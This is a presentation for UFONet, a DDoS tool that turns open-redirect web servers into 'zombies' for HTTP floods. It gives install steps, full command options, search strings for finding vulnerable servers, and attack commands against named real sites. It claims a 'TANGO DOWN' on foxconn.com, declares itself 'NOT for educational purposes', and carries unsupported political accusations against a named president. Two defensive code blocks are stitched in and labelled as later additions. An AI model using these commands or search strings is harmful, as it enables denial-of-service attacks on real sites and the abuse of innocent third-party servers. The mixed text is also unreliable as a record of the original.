
UFONet v0.3 Abduction Spanish GSICK

UFONet is a Python tool for launching DDoS attacks via web abuse vectors like open redirects. It functions by searching for vulnerable "zombie" servers on the internet and using them to conduct HTTP floods against a target. The document provides information on how UFONet works, how to install and use it, examples of searching for zombies and attacking a target, and discusses plans for continued development.


===============================================

UFONet
DDoS Attacks via Web Abuse
2013/2014
by psy
===============================================
http://ufonet.sf.net

Edition: GSICKMINDS 2014

===============================================

WARNING !!!!
Name: Coltan
Composition:
- Columbite; FeMn+Nb2O6 (niobium oxide)
- Tantalite; FeMn+Ta2 (tantalum oxide)
Relevance: Electrolytic capacitor
Use: Mobile telephony, computers, medical implants, weaponry...
Issues:
- Congo 82% of world reserves (Great Lakes).
- Occurs among uranium, thorium and radium (radioactivity).
Consideration: non-renewable, strategic energy resource.
War: Since 1998. Approx. 5,7 million victims.
* Rwandan Patriotic Army Rwanda West.
* West forgives Rwanda's debt + IMF and Central Bank credit.
- Price: 1Tn = 400.000$ | 18 months 250.000M$
- Salary: Congo average 8/m | Miner: 42/m

===============================================


WANTED:
ID: Paul Kagame (23/10/1957)
Position: President of Rwanda
CV:
- Founder of the Rwandan Patriotic Front
- Head of military intelligence: ERN
- Training: Fort Leavenworth(USA)
Crimes:
- Assassination order: Juvénal Habyarimana(Rwanda)
- Assassination order: Cyprien Ntaryamira(Burundi)
- Directing genocide since 1994
Proceedings:
25/09/2003: Receives diplomatic immunity
14/11/2003: Carla Del Ponte(SUI), TIDH prosecutor -> removed
21/01/2005: Stephen Rapp(USA), OBAMA's prosecutor, takes the post
06/02/2008: Case opened for crimes against humanity(pdf)
30/10/2014: Free

===============================================


MISSION:

foxconn.com

RealNick: Hon Hai Precision Industry Co.(TAI)
Owner: Terry Guo aka Gou Tai-ming
Information:
World's largest producer of electronic devices
Contracts:
*BlackBerry *iPad, *iPhone, *Kindle, *Playstation4
*Xbox One, *Wii U

Clients:
Acer Inc.(TAI)
Amazon.com(USA)
Apple Inc.(USA)
BlackBerry Ltd.(CAN)
Cisco(USA)
Dell(USA)
Google(USA)
Hewlett-Packard(USA)

Microsoft(USA)
Motorola Mobility(USA)
Nintendo(JPN)
Nokia(FIN)
Sony(JPN)
Toshiba(JPN)
Vizio(USA)

===============================================


STATUS:

TANGO DOWN ! ;-)


===============================================

Current version (05/10/2014): v0.3.1b - Abduction

===============================================
* What is UFONet?
* How does it work?
* Installation
* Features
* Usage examples
* Simulated Attack
* Next version
* How to contribute?
===============================================

'Top 10' application risks: OWASP 2013

/What is UFONet?/
===============================================
+ Automated tool for launching DDoS attacks
+ Written in python / GPL v3.0
+ First version:
  - Born as a module of XSSer (2009)
  - Released: v0.1b 2013
+ Exploits Layer 7 (HTTP/Web Abuse)
  - Open Redirect vectors
    OWASP: Top 10 2013-A10-Unvalidated Redirects and Forwards
+ Goal: resource exhaustion (DoS)

===============================================

Video (v0.1b): UFONet PoC

/How does it work?/
===============================================
+ CWE-601: URL Redirection to Untrusted Site
A web application accepts user-controlled input
that specifies a link to an external website,
and uses that link in a redirect.
+ OWASP: URL Redirector Abuse
An application accepts arbitrary user-defined URLs,
which are then used as redirect targets. Users can
be led, without knowing it, from a trusted site
to a malicious one.
Ex: Phishing attacks
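
On the defensive side, the CWE-601 condition described above goes away when the application validates the redirect parameter before using it. The following is an added example, not part of the original slides or of UFONet; the function name, the allow-list and the example.org / evil.test hosts are assumptions chosen for illustration.

```python
from urllib.parse import urlsplit

# Hosts this (hypothetical) application may redirect to.
ALLOWED_HOSTS = {"example.org", "www.example.org"}

def safe_redirect_target(raw, default="/"):
    """Return raw if it is an acceptable redirect target, else default."""
    if not raw or len(raw) > 2048 or raw != raw.strip():
        return default
    # Browsers treat "\" like "/" and drop tab/newline characters,
    # so refuse both before any parsing takes place.
    if "\\" in raw or any(ord(c) < 0x20 or ord(c) == 0x7F for c in raw):
        return default
    try:
        parts = urlsplit(raw)
    except ValueError:
        return default
    # Local path: exactly one leading slash ("//host" is scheme-relative).
    if not parts.scheme and not parts.netloc:
        if raw.startswith("/") and not raw.startswith("//"):
            return raw
        return default
    if parts.scheme not in ("http", "https"):
        return default
    # "https://example.org@evil.test/" really points at evil.test.
    if parts.username is not None or parts.password is not None:
        return default
    host = (parts.hostname or "").lower().rstrip(".")
    return raw if host in ALLOWED_HOSTS else default
```

A handler for an endpoint such as `check?uri=` would pass the parameter through this function and redirect only to the returned value.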

===============================================

Video (v0.3b/DE): DDoS-Angriff über Validatoren

/How does it work?/
===============================================

===============================================

Code: git clone https://github.com/epsylon/ufonet

/Installation/
===============================================
UFONet runs on several platforms.
- GNU/Linux / Win32 / OSX
Requires:
- Python (~2.7.x)
- python-pycurl - Python bindings to libcurl
On Debian-based systems (e.g. Ubuntu):
~$ sudo apt-get install python-pycurl

===============================================

See commands: $ ufonet -h / --help

/Features/
===============================================
+ Modularity:
  - Code written from scratch (clean)
+ Proxy: (e.g. Tor)
  - Master -> Proxy -> Proxy(Zombie) -> Target
+ Spoofing: (HTTP headers)
  - User-Agent/Referer/Host/X-Forwarded-For/...
+ Botnet controller:
  - Search for 'zombies' on the Internet
  - Test the vulnerabilities (Open Redirect)
+ Impact: Request(s) / Evade cache on target/...

===============================================

First version: 18.06.2013

/Features/
===============================================
  --version            show program's version number and exit
  -v, --verbose        active verbose on requests
  --check-tor          check to see if Tor is used properly
  --update             check for latest stable version

*Configure Request(s)*:
  --proxy=PROXY        Use proxy server (tor: http://localhost:8118)
  --user-agent=AGENT   Use another HTTP User-Agent header (default SPOOFED)
  --referer=REFERER    Use another HTTP Referer header (default SPOOFED)
  --host=HOST          Use another HTTP Host header (default NONE)
  --xforw              Set your HTTP X-Forwarded-For with random IP values
  --xclient            Set your HTTP X-Client-IP with random IP values
  --timeout=TIMEOUT    Select your timeout (default 30)
  --retries=RETRIES    Retries when the connection timeouts (default 1)
  --delay=DELAY        Delay in seconds between each HTTP request (default 0)

*Manage Botnet*:
  -s SEARCH            Search 'zombies' on google (ex: -s 'proxy.php?url=')
  --sn=NUM_RESULTS     Set max number of result to search (default 10)
  -t TEST              Test list of web 'zombie' servers (ex: -t zombies.txt)

*Configure Attack(s)*:
  -r ROUNDS            Set number of 'rounds' for the attack (default: 1)
  -b PLACE             Set a place to 'bit' on target (ex: -b /path/big.jpg)
  -a TARGET            Start a Web DDoS attack (ex: -a http(s)://target.com)

===============================================

Zombie gift: pastebin

/Usage examples/
===============================================
+ Searching for 'zombies'
UFONet will search Google's results
1- Search for results:
Ex: ./ufonet -s 'proxy.php?url=' --sn '100'
'checklink?uri='
'validator?uri='
2- Test validity:
Wanna check if they are valid zombies? (Y/n)
3- Update list:
Wanna update your list (Y/n)

===============================================

Documentation: README

/Usage examples/
===============================================
+ Testing the botnet
UFONet will test the 'Open Redirect' vulnerabilities
http://target.com/check?uri=<PAYLOAD>
Ex: ./ufonet -t zombies.txt
1- Are they alive?:
HTTP HEAD Check:
- From master: REMEMBER -> PROXY!!!
- From outside: downforeveryoneorjustme
2- Update list:
Wanna update your list (Y/n)

===============================================

Largest attack tested: 3439 zombies

/Usage examples/
===============================================
+ Attacking a target
UFONet will drive the zombies to the target
+ Number of rounds per zombie
Ex: -r 10 / -r 10000
+ Place to bite (e.g. Flash movie, ...)
Ex: -b "/images/big_size_image.jpg"
------------------------------------------------------
./ufonet -a http://target.com
* Round: Is target up?
Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)
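
An operator of a site that exposes a `url=` / `uri=` endpoint can spot this relay pattern in its own access log: many requests whose parameter names the same third-party host. The following is an added detection example, not part of the original slides or of UFONet; the log format (combined), the threshold, the function names and all sample entries are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
# Parameter names taken from the search strings on this page (url=, uri=).
URL_PARAMS = ("url", "uri")

def relay_targets(log_lines, own_hosts):
    """Count requests whose url=/uri= value names a host we do not run."""
    hits = Counter()
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        try:
            query = parse_qs(urlsplit(match.group(1)).query)
            values = [v for name in URL_PARAMS for v in query.get(name, [])]
            hosts = [(urlsplit(v).hostname or "").lower() for v in values]
        except ValueError:  # malformed URL in the request
            continue
        for host in hosts:
            if host and host not in own_hosts:
                hits[host] += 1
    return hits

def flag_relay_abuse(log_lines, own_hosts, threshold=3):
    """Return external hosts requested through us at least `threshold` times."""
    counts = relay_targets(log_lines, own_hosts)
    return {host: n for host, n in counts.items() if n >= threshold}

def _line(ip, path):  # builds one constructed sample entry
    return f'{ip} - - [05/Oct/2014:10:00:00 +0000] "GET {path} HTTP/1.1" 200 512 "-" "-"'

# Constructed sample log: documentation IP ranges and .test host names.
SAMPLE_LOG = [
    _line("203.0.113.7", "/checklink?uri=http://victim.test/images/big.jpg"),
    _line("198.51.100.9", "/checklink?uri=http%3A%2F%2Fvictim.test%2Fimages%2Fbig.jpg"),
    _line("192.0.2.44", "/validator?uri=http://VICTIM.test/images/big.jpg"),
    _line("192.0.2.10", "/proxy.php?url=http://other.test/"),
    _line("192.0.2.10", "/checklink?uri=http://www.example.org/page.html"),
    _line("192.0.2.10", "/index.html"),
]
```

Counting by the host inside the parameter rather than by client address keeps the check useful when requests arrive through proxies or with varied headers.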

===============================================

All my zombies are belong to you ;-)

/Simulated Attack/
===============================================
+ From master:
./ufonet --check-tor

===============================================

/Simulated Attack/
===============================================
./ufonet -t zombies.txt

===============================================

/Simulated Attack/
===============================================
./ufonet -a http://myecoin.net -r 10000

===============================================

It's not just you! http://nsa.gov looks down from here

/Simulated Attack/
===============================================
+ From target:

===============================================

Irc.freenode.net / #ufonet

/Next version/
===============================================
+ Name: UFONet v0.4b: Infection!
* Ideas:
- POST
- XML
- Anti-IDS/NIDS
- XSS/CSRF
- Multithreading
- HTTP Headers (rfc4229)
- GUI/GTK+
- Geomapping
- Visual impact
- Statistics/Reports
- [...]

===============================================

Author: [email protected] <> @psytzsche

/How to contribute?/
===============================================
+ Development:
- Testing
- Documentation
- Bug fixes / Hacking ;-)
- Proposals/Ideas/New features

+ Support:
- Donations
BTC: 1Q63KtiLGzXiYA8XkWFPnWo7nKPWFr3nrc
ECO: 6enjPY7PZVq9gwXeVCxgJB8frsf4YFNzVp
- Promotions / Events / Jobs ...

===============================================

This tool is NOT for educational purposes :-)

===============================================
